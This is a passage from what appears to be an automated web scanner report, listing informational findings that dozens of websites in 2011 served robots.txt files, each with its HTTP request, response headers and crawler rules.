Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

User-agent: *
Disallow: /admin
Disallow: /newfanshot
Disallow: /search
Disallow: /account
Disallow:
...[SNIP]...

27.1467. http://www.simpleanddelicious.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simpleanddelicious.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simpleanddelicious.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:30:17 GMT
Server: Apache/2.2.9 (Unix) DAV/2 mod_jk/1.2.28 mod_ssl/2.2.9 OpenSSL/0.9.8h mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Tue, 16 Jun 2009 17:08:07 GMT
ETag: "821b21-b4-46c7a37ee0bc0"
Accept-Ranges: bytes
Content-Length: 180
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /*email-to-friend.jsp
Disallow: /*recipePrint.jsp
Disallow: /*menuplan.do
Disallow: /*printCoupon.do

Sitemap: http://www.simpleanddelicious.com/sitemap.xml

27.1468. http://www.simplegiftsfarm.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplegiftsfarm.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simplegiftsfarm.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:06:54 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.simplegiftsfarm.com/dBMhuXdt.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
...[SNIP]...

27.1469. http://www.simply.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simply.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simply.tv

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:07 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 10 Dec 2008 20:12:20 GMT
ETag: "d70007-636-e092f100"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:21:07 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1470. http://www.simplyaudiobooks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.simplyaudiobooks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.simplyaudiobooks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:37 GMT
Server: Apache
Last-Modified: Tue, 23 Mar 2010 16:36:08 GMT
ETag: "1e05b1-19f-4827a691d6e00"
Accept-Ranges: bytes
Content-Length: 415
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent:    *
Disallow:    /admin
Disallow:    /catalogs
Disallow:    /cgi-bin
Disallow:    /community
Disallow:    /dotproject
Disallow:    /env
Disallow:    /flash
Disallow:    /getImages
Disallow:    /includes
Disallow:    /man
...[SNIP]...

27.1471. http://www.singtao.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.singtao.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.singtao.com

Response

HTTP/1.1 200 OK
Content-Length: 2078
Content-Type: text/plain
Last-Modified: Tue, 24 Mar 2009 02:51:52 GMT
Accept-Ranges: bytes
ETag: "689dfe7b2bacc91:5c8b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:34:02 GMT
Connection: close

User-agent:Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /big20/
Disallow: /bma/
Disallow: /books_asp/
Disallow: /breakingnews/
Disallow: /china/
Disallow: /chineseradio/
Disallo
...[SNIP]...

27.1472. http://www.siuc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.siuc.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.siuc.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:47:13 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Tue, 25 Jan 2011 19:46:28 GMT
ETag: "2be8516-39c-49ab0f8ec4d00"
Accept-Ranges: bytes
Content-Length: 924
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

User-agent: *
Disallow: /images2010/
Disallow: /images/
Disallow: /chancellorsearch/
Disallow: /Connections/
Disallow: /css/
Disallow: /css2010/
Disallow: /er/
Disallow: /erima
...[SNIP]...

27.1473. http://www.sixt.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sixt.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sixt.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 11 Feb 2009 16:35:00 GMT
ETag: "d7389e-5c-462a72f54f500"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: text/plain
P3P: policyref='http://www.sixt.com/w3c/p3p.xml',CP='NON DSP COR CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR COM NAV DEM'
Date: Wed, 04 May 2011 04:16:58 GMT
Connection: close

User-agent: *
Disallow:
Disallow: /php/seo/
Disallow: /*b2b*/
Disallow: /autokauf/abostats/

27.1474. http://www.skincareresourcecenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skincareresourcecenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.skincareresourcecenter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:08 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.skincareresourcecenter.com/QZBpRcxO.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow
...[SNIP]...

27.1475. http://www.slapadoodle.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slapadoodle.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slapadoodle.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:45:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO PSA OUR"
Content-Length: 67
Connection: close
Content-Type: text/html; charset=UTF-8

User-agent: *
Crawl-delay:20
Disallow: /click.php
Disallow: /ud.php

27.1476. http://www.slashgossip.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.slashgossip.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.slashgossip.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:15:03 GMT
Server: Apache/1.3.41 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Pingback: http://slashgossip.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://slashgossip.com/sitemap.xml.gz

27.1477. http://www.sld.cu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sld.cu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sld.cu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:59:41 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch
Last-Modified: Mon, 14 Feb 2011 14:05:47 GMT
ETag: "658c0c1-cb-49c3e8b5ee4c0"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /adminpor/
Disallow: /taller/usuario1/
Disallow: /taller/usuario2/
Disallow: /taller/usuario3/
Disallow: /taller/usuario4/
Disallow: /taller/taller/
Disallow: /sitios/estudios/
...[SNIP]...

27.1478. http://www.sleepconnect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sleepconnect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sleepconnect.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 03:25:40 GMT
Content-Type: text/plain
Content-Length: 257
Last-Modified: Tue, 15 Feb 2011 20:44:11 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /comment/
Disallow: /flag/
Disallow: /reply/
Disallow: /track/
# _
# [ ] Malfunction. Need input!
# (o_O) /
# |_|
# __/===\__
# //| o=o |\\
# <]
...[SNIP]...

27.1479. http://www.smartcart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smartcart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smartcart.com

Response

HTTP/1.0 200 OK
Connection: keep-alive
Server: Roxen/2.1.221
Accept-Ranges: bytes
P3P: policyref="http://www.smartcart.com/w3c/p3p.xml",CP="DSP NOI CUR TAI OUR NOR IND STA ADM UNI INT"
Content-Type: text/plain
Content-Length: 198

User-agent: *
Disallow: /*/cgi/main_path.txt
Disallow: /*/cgi/ratesys.cgi
Disallow: /*/cgi/wishlist.cgi
Disallow: /*/images/
Disallow: /*/smartadmin/
Disallow: /shoppingcart/img/
Disallow: /common/

27.1480. http://www.smashbox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smashbox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smashbox.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:09 GMT
Server: Apache
Content-Length: 103
Last-Modified: Fri, 22 Apr 2011 00:09:09 GMT
NS_RTIMER_COMPOSITE: 1512733134:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2010.2.0; domain=www.smashbox.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=383
Connection: Keep-Alive
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:

27.1481. http://www.smccme.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smccme.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smccme.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:45:49 GMT
Server: Apache
Last-Modified: Fri, 23 Apr 2010 17:34:42 GMT
ETag: "50bc1-130-484ead7a57080"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1482. http://www.smnnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smnnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smnnews.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:28:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://www.smnnews.com/WP/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.1483. http://www.smokin4free.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smokin4free.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.smokin4free.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:05:14 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Wed, 05 Jul 2006 15:47:20 GMT
ETag: "3d1dd2c-49-417d78befd200"
Accept-Ranges: bytes
Content-Length: 73

User-agent: *
Disallow: /cgi-bin/

User-agent: SiteSucker
Disallow: *

27.1484. http://www.snapsurveys.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snapsurveys.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snapsurveys.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:12:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 15:42:23 GMT
ETag: "9f5a1e-1df-49fc923b2b5c0"
Accept-Ranges: bytes
Content-Length: 479
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /forum/
Disallow: /cgi-bin/
Disallow: /sales-resource/
Disallow: /datable/
Disallow: /videos/
Disallow: /internal/
Disallow: /news/archive/
Disallow: complete-page-inde
...[SNIP]...

27.1485. http://www.snipercountry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snipercountry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snipercountry.com

Response

HTTP/1.1 200 OK
Content-Length: 438
Content-Type: text/plain
Last-Modified: Sat, 17 May 2003 18:48:25 GMT
Accept-Ranges: bytes
ETag: "601c21e6a41cc31:4f4"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:43:45 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin/
Disallow: /graphics/
Disallow: /Bunker/
Disallow: /emails/
Disallow: /events/
Disallow: /images/
Disallow: /Junk/
Disa
...[SNIP]...

27.1486. http://www.snipershide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snipershide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.snipershide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:03 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 02:21:58 GMT
ETag: "d71004-3fe-49c5cf2023d80"
Accept-Ranges: bytes
Content-Length: 1022
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-Delay: 3
Disallow: /forum/ubbthreads.php?ubb=calendar
Disallow: /forum/ubbthreads.php/ubb/calendar
Disallow: /forum/ubbthreads.php?ubb=showday
Disallow: /forum/ubbthreads.php/ubb/s
...[SNIP]...

27.1487. http://www.soapoperafan.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soapoperafan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soapoperafan.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:22 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Wed, 21 Jan 2009 11:36:52 GMT
ETag: "3001e1-4c-460fc9282f401"
Accept-Ranges: bytes
Content-Length: 76
Vary: Accept-Encoding
X-Served-By: app2v.lax1
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /soappolls/
Disallow: /images/
Disallow: /cgi-bin/


27.1488. http://www.soccerbyives.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soccerbyives.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soccerbyives.net

Response

HTTP/1.1 200 OK
Server: Apache
X-PhApp: oak-tp-web049
X-Webserver: oak-tp-web049
Vary: cookie
Keep-Alive: timeout=300, max=100
Content-Type: text/plain; charset=utf-8
Content-Length: 341
Date: Wed, 04 May 2011 02:38:31 GMT
X-Varnish: 3676777540 3586961622
Age: 80182
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /t/trackback
Disallow: /t/comments
Disallow: /t/stats
Disallow: /t/app
Disallow: /.m/

User-agent: Googlebot-Mobile
Allow: /.m/
Disallow: /

User-agent: Y!J-SRD
Allow: /.m/
Dis
...[SNIP]...

27.1489. http://www.softgeek.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softgeek.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.softgeek.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:45:53 GMT
Server: Apache
Last-Modified: Fri, 04 Mar 2011 01:11:43 GMT
ETag: "74722cd-33-49d9dd43c71c0"
Accept-Ranges: bytes
Content-Length: 51
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /sources
Disallow: /skins

27.1490. http://www.softlow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.softlow.com

Response

HTTP/1.1 200 OK
Server: nginx/0.5.35
Date: Wed, 04 May 2011 01:34:13 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Sun, 04 May 2008 16:41:24 GMT
ETag: "41ca81-75-49213500"
Accept-Ranges: bytes
Content-Length: 117
Vary: Accept-Encoding

User-agent: *
Disallow: /redirect
Disallow: /redirect/
User-agent: Googlebot
Disallow: /redirect
Disallow: /redirect/

27.1491. http://www.solostream.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.solostream.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.solostream.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:23 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 11 Feb 2010 17:39:30 GMT
Accept-Ranges: bytes
Content-Length: 277
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: TechnoratiBot/8.1
Disallow:

User-agent: *
Disallow: /print/
Disallow: /email/
Disallow: /cgi-bin/
Disallow: /trackback/
Disallow: /wp-admin/
Disallow: /wp-content/
Disallow: /wp
...[SNIP]...

27.1492. http://www.somospelota.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.somospelota.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.somospelota.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:41 GMT
Server: Apache
Last-Modified: Wed, 05 Nov 2008 14:27:38 GMT
ETag: "ff2582-130-4911ad5a"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1493. http://www.song.ly/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.song.ly
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.song.ly

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:29:46 GMT
Server: Apache/2.0.54
Last-Modified: Wed, 18 Nov 2009 19:17:06 GMT
ETag: "749cf13-22-169cf080"
Accept-Ranges: bytes
Content-Length: 34
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: msnbot*
Disallow: /

27.1494. http://www.sonichealthcareusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonichealthcareusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sonichealthcareusa.com

Response

HTTP/1.1 200 OK
Content-Length: 869
Content-Type: text/plain
Last-Modified: Tue, 09 Feb 2010 09:27:18 GMT
Accept-Ranges: bytes
ETag: "2e6e37136aa9ca1:45e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:13:02 GMT
Connection: close

### BEGIN FILE ###
#
# allow-all
#
#
# The use of robots or other automated means to access the sonichealthcare site
# without the express permission of sonichealthcare is strictly prohibited.
...[SNIP]...

27.1495. http://www.sonicretro.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonicretro.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sonicretro.org

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 04:10:13 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Pingback: http://www.sonicretro.org/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: Accept-Encoding
Content-Length: 75
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.sonicretro.org/sitemap.xml.gz

27.1496. http://www.sonicstate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonicstate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sonicstate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:30:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 11 Jun 2010 11:38:08 GMT
ETag: "c8775-e9-92b04800"
Accept-Ranges: bytes
Content-Length: 233
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /dat/
Disallow: /m/
Disallow: /synth_html/
Disallow: /ads/
Disallow: /bbsonic/
Disallow: /partners/
Disallow: /synth/tools/
Disallow: /synth/_inc
Disallow: /synth_xtra
...[SNIP]...

27.1497. http://www.sonoraquest.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonoraquest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sonoraquest.com

Response

HTTP/1.1 200 OK
Content-Length: 330
Content-Type: text/plain
Content-Location: http://www.sonoraquest.com/robots.txt
Last-Modified: Mon, 18 Oct 2010 15:35:07 GMT
Accept-Ranges: bytes
ETag: "feb1f8ada6ecb1:59fd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:04:24 GMT
Connection: close

Sitemap: http://www.sonoraquest.com/sitemap.xml
User-agent: *
Disallow: /admin
Disallow: /App_Browsers
Disallow: /App_Code
Disallow: /App_Data
Disallow: /App_Themes
Disallow: /bin
Disallow: /c
...[SNIP]...

27.1498. http://www.sonorika.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonorika.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sonorika.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:00 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.8 mod_ssl/2.8.28 OpenSSL/0.9.8a
Last-Modified: Tue, 15 Mar 2011 09:39:12 GMT
ETag: "13a6f6-6a9-4d7f33c0"
Accept-Ranges: bytes
Content-Length: 1705
Connection: close
Content-Type: text/plain

# Wikipedia work bots:
User-agent: IsraBot
Disallow:

User-agent: Orthogaffe
Disallow:

# Crawlers that are kind enough to obey, but which we'd rather not have
# unless they're feeding search engines.
...[SNIP]...

27.1499. http://www.sooperarticles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sooperarticles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sooperarticles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:21:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sat, 24 Jan 2009 05:00:27 GMT
ETag: "114-461336248b0c0"
Accept-Ranges: bytes
Content-Length: 276
Vary: Accept-Encoding,User-Agent
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
X-Powered-By: ISolution.org
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: psbot
User-agent: turnitinbot
User-agent: NPBot
User-agent: webzip
User-agent: OmniExplorer_Bot
User-agent: BoardReader
Disallow: /

User-agent: Bot@FindInArticles.com
Disallow: /

User-ag
...[SNIP]...

27.1500. http://www.sosstaffing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sosstaffing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sosstaffing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:50 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Last-Modified: Wed, 01 Dec 2010 00:31:32 GMT
ETag: "20c090-4c-6d49a100"
Accept-Ranges: bytes
Content-Length: 76
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /onlineapp/
Disallow: /ekhire/
Disallow: /SOSLogin/

27.1501. http://www.sound-effect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sound-effect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sound-effect.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:18:26 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sat, 22 Nov 2008 12:58:34 GMT
ETag: "17d8346-1f2-b828f280"
Accept-Ranges: bytes
Content-Length: 498
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /admin/
Disallow: /bulk_admin
Disallow: /midi1
Disallow: /mockup
Disallow: /js
Disallow: /fm
Disallow: /download
Disallow: /order
Disallow: /images
Disallow: /windows_software

...[SNIP]...

27.1502. http://www.soundtrack.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundtrack.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.soundtrack.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:49:33 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Feb 2011 14:05:46 GMT
ETag: "3051218-b5-60e5e280"
Accept-Ranges: bytes
Content-Length: 181
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
User-agent: *
Disallow: /cgi-bin/
Disallow: /~dak/admin/
Disallow: /admin/
Disallow: /img/
Disallow: /images/
User-agent: ptd-crawler
Disallow: /

27.1503. http://www.sourcingmap.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sourcingmap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.sourcingmap.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 01:08:43 GMT
Content-Type: text/plain
Content-Length: 3105
Last-Modified: Fri, 03 Dec 2010 08:33:32 GMT
Connection: close
Vary: Accept-Encoding
Expires: Fri, 03 Jun 2011 01:08:43 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-agent: *
Disallow: /admin/
Disallow: /xml/
Disallow: /shopping_cart.php
Disallow: /flow/
Disallow: /*action=buy_now
Disallow: /tech-support-download/
Disallow: /*action=notify_remove
Disallow: /l
...[SNIP]...

27.1504. http://www.southalabama.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.southalabama.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.southalabama.edu

Response

HTTP/1.1 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Wed, 04 May 2011 02:15:35 GMT
Content-type: text/plain
